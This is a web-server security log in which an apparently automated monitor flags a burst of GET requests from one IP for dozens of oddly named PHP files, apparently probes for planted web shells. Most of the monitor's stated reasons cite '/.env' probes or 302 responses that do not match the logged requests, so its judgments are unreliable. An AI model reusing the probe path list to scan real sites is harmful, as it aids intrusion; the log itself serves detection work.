Line=2026-03-20T09:11:31.322782364Z 20.220.232.240 - - [20/Mar/2026:09:11:31 +0000] "media.admin.kovicloud.com" "GET /ws86.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380330 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 response to a GET on a PHP endpoint from an external IP and host header could indicate probing or malformed request patterns typical of automated scanners. Line=2026-03-20T09:11:31.393665992Z 20.220.232.240 - - [20/Mar/2026:09:11:31 +0000] "media.admin.kovicloud.com" "GET /ws86.php HTTP/1.1" 400 143 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380356 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:31.461470627Z 20.220.232.240 - - [20/Mar/2026:09:11:31 +0000] "media.admin.kovicloud.com" "GET /xwx1.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380402 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:31.529510083Z 20.220.232.240 - - [20/Mar/2026:09:11:31 +0000] "media.admin.kovicloud.com" "GET /xwx1.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380434 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:31.596566770Z 20.220.232.240 - - [20/Mar/2026:09:11:31 +0000] "media.admin.kovicloud.com" "GET /ggb.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380458 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:31.664242125Z 20.220.232.240 - - [20/Mar/2026:09:11:31 +0000] "media.admin.kovicloud.com" "GET /ggb.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380483 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:31.732239538Z 20.220.232.240 - - [20/Mar/2026:09:11:31 +0000] "media.admin.kovicloud.com" "GET /xff.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380508 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:31.800016841Z 20.220.232.240 - - [20/Mar/2026:09:11:31 +0000] "media.admin.kovicloud.com" "GET /xff.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380533 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:31.867264173Z 20.220.232.240 - - [20/Mar/2026:09:11:31 +0000] "media.admin.kovicloud.com" "GET /wwx.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380554 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:31.935240442Z 20.220.232.240 - - [20/Mar/2026:09:11:31 +0000] "media.admin.kovicloud.com" "GET /wwx.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380575 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:32.002506863Z 20.220.232.240 - - [20/Mar/2026:09:11:32 +0000] "media.admin.kovicloud.com" "GET /term.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380596 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:32.070294811Z 20.220.232.240 - - [20/Mar/2026:09:11:32 +0000] "media.admin.kovicloud.com" "GET /term.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380732 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:32.137898348Z 20.220.232.240 - - [20/Mar/2026:09:11:32 +0000] "media.admin.kovicloud.com" "GET /ws77.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380761 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 response to a GET on a PHP endpoint from an external IP and host header could indicate probing or malformed request patterns typical of automated scanners. Line=2026-03-20T09:11:32.207067887Z 20.220.232.240 - - [20/Mar/2026:09:11:32 +0000] "media.admin.kovicloud.com" "GET /ws77.php HTTP/1.1" 400 143 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380784 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:32.275558055Z 20.220.232.240 - - [20/Mar/2026:09:11:32 +0000] "media.admin.kovicloud.com" "GET /gifclass.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380806 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:32.344885413Z 20.220.232.240 - - [20/Mar/2026:09:11:32 +0000] "media.admin.kovicloud.com" "GET /gifclass.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380827 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:32.412052175Z 20.220.232.240 - - [20/Mar/2026:09:11:32 +0000] "media.admin.kovicloud.com" "GET /8.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380893 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:32.481656536Z 20.220.232.240 - - [20/Mar/2026:09:11:32 +0000] "media.admin.kovicloud.com" "GET /8.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380919 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:32.548939139Z 20.220.232.240 - - [20/Mar/2026:09:11:32 +0000] "media.admin.kovicloud.com" "GET /155.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380960 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:32.616869750Z 20.220.232.240 - - [20/Mar/2026:09:11:32 +0000] "media.admin.kovicloud.com" "GET /155.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.380987 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:32.686249756Z 20.220.232.240 - - [20/Mar/2026:09:11:32 +0000] "media.admin.kovicloud.com" "GET /mh.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381013 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:32.754257417Z 20.220.232.240 - - [20/Mar/2026:09:11:32 +0000] "media.admin.kovicloud.com" "GET /mh.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381038 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:32.821340330Z 20.220.232.240 - - [20/Mar/2026:09:11:32 +0000] "media.admin.kovicloud.com" "GET /222.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381063 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:32.889235566Z 20.220.232.240 - - [20/Mar/2026:09:11:32 +0000] "media.admin.kovicloud.com" "GET /222.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381089 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:32.956772713Z 20.220.232.240 - - [20/Mar/2026:09:11:32 +0000] "media.admin.kovicloud.com" "GET /hehe.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381114 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:33.025879310Z 20.220.232.240 - - [20/Mar/2026:09:11:33 +0000] "media.admin.kovicloud.com" "GET /hehe.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381139 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:33.098987174Z 20.220.232.240 - - [20/Mar/2026:09:11:33 +0000] "media.admin.kovicloud.com" "GET /tool.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381183 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:33.168043910Z 20.220.232.240 - - [20/Mar/2026:09:11:33 +0000] "media.admin.kovicloud.com" "GET /tool.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381207 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:33.235661022Z 20.220.232.240 - - [20/Mar/2026:09:11:33 +0000] "media.admin.kovicloud.com" "GET /wp-act.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381233 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:33.314107996Z 20.220.232.240 - - [20/Mar/2026:09:11:33 +0000] "media.admin.kovicloud.com" "GET /wp-act.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381259 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:33.400699793Z 20.220.232.240 - - [20/Mar/2026:09:11:33 +0000] "media.admin.kovicloud.com" "GET /cu.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381286 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:33.475663744Z 20.220.232.240 - - [20/Mar/2026:09:11:33 +0000] "media.admin.kovicloud.com" "GET /cu.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381327 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:33.542868210Z 20.220.232.240 - - [20/Mar/2026:09:11:33 +0000] "media.admin.kovicloud.com" "GET /fs.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381353 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:33.611347531Z 20.220.232.240 - - [20/Mar/2026:09:11:33 +0000] "media.admin.kovicloud.com" "GET /fs.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381378 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:33.679155554Z 20.220.232.240 - - [20/Mar/2026:09:11:33 +0000] "media.admin.kovicloud.com" "GET /asd.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381406 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:33.747734699Z 20.220.232.240 - - [20/Mar/2026:09:11:33 +0000] "media.admin.kovicloud.com" "GET /asd.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381432 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:33.819305049Z 20.220.232.240 - - [20/Mar/2026:09:11:33 +0000] "media.admin.kovicloud.com" "GET /ws80.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381458 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 response to a GET on a PHP endpoint from an external IP and host header could indicate probing or malformed request patterns typical of automated scanners. Line=2026-03-20T09:11:33.886944908Z 20.220.232.240 - - [20/Mar/2026:09:11:33 +0000] "media.admin.kovicloud.com" "GET /ws80.php HTTP/1.1" 400 143 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381491 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:33.961613098Z 20.220.232.240 - - [20/Mar/2026:09:11:33 +0000] "media.admin.kovicloud.com" "GET /ms.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381517 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:34.029571325Z 20.220.232.240 - - [20/Mar/2026:09:11:34 +0000] "media.admin.kovicloud.com" "GET /ms.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381545 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:34.097480011Z 20.220.232.240 - - [20/Mar/2026:09:11:34 +0000] "media.admin.kovicloud.com" "GET /jga.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381572 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:34.167897421Z 20.220.232.240 - - [20/Mar/2026:09:11:34 +0000] "media.admin.kovicloud.com" "GET /jga.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381597 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:34.236178573Z 20.220.232.240 - - [20/Mar/2026:09:11:34 +0000] "media.admin.kovicloud.com" "GET /666.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381627 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:34.303823108Z 20.220.232.240 - - [20/Mar/2026:09:11:34 +0000] "media.admin.kovicloud.com" "GET /666.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381657 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:34.370878746Z 20.220.232.240 - - [20/Mar/2026:09:11:34 +0000] "media.admin.kovicloud.com" "GET /zc-104.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381686 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:34.438614913Z 20.220.232.240 - - [20/Mar/2026:09:11:34 +0000] "media.admin.kovicloud.com" "GET /zc-104.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381712 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:34.506519430Z 20.220.232.240 - - [20/Mar/2026:09:11:34 +0000] "media.admin.kovicloud.com" "GET /ws88.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381735 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 response to a GET on a PHP endpoint from an external IP and host header could indicate probing or malformed request patterns typical of automated scanners. Line=2026-03-20T09:11:34.574135805Z 20.220.232.240 - - [20/Mar/2026:09:11:34 +0000] "media.admin.kovicloud.com" "GET /ws88.php HTTP/1.1" 400 143 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381776 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:34.641390539Z 20.220.232.240 - - [20/Mar/2026:09:11:34 +0000] "media.admin.kovicloud.com" "GET /ws60.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381803 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 response to a GET on a PHP endpoint from an external IP and host header could indicate probing or malformed request patterns typical of automated scanners. Line=2026-03-20T09:11:34.710591800Z 20.220.232.240 - - [20/Mar/2026:09:11:34 +0000] "media.admin.kovicloud.com" "GET /ws60.php HTTP/1.1" 400 143 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381830 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:34.778692610Z 20.220.232.240 - - [20/Mar/2026:09:11:34 +0000] "media.admin.kovicloud.com" "GET /bo.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381855 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:34.850891505Z 20.220.232.240 - - [20/Mar/2026:09:11:34 +0000] "media.admin.kovicloud.com" "GET /bo.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381880 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:34.918107013Z 20.220.232.240 - - [20/Mar/2026:09:11:34 +0000] "media.admin.kovicloud.com" "GET /ws84.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381905 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 response to a GET on a PHP endpoint from an external IP and host header could indicate probing or malformed request patterns typical of automated scanners. Line=2026-03-20T09:11:35.005786935Z 20.220.232.240 - - [20/Mar/2026:09:11:35 +0000] "media.admin.kovicloud.com" "GET /ws84.php HTTP/1.1" 400 143 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381929 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:35.113954309Z 20.220.232.240 - - [20/Mar/2026:09:11:35 +0000] "media.admin.kovicloud.com" "GET /public/vx.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381955 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:35.186220758Z 20.220.232.240 - - [20/Mar/2026:09:11:35 +0000] "media.admin.kovicloud.com" "GET /public/vx.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.381981 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:35.270141389Z 20.220.232.240 - - [20/Mar/2026:09:11:35 +0000] "media.admin.kovicloud.com" "GET /vanda.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.382008 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:35.342329955Z 20.220.232.240 - - [20/Mar/2026:09:11:35 +0000] "media.admin.kovicloud.com" "GET /vanda.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.382032 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:35.409542485Z 20.220.232.240 - - [20/Mar/2026:09:11:35 +0000] "media.admin.kovicloud.com" "GET /amp.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.382058 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:35.477480105Z 20.220.232.240 - - [20/Mar/2026:09:11:35 +0000] "media.admin.kovicloud.com" "GET /amp.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.382082 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
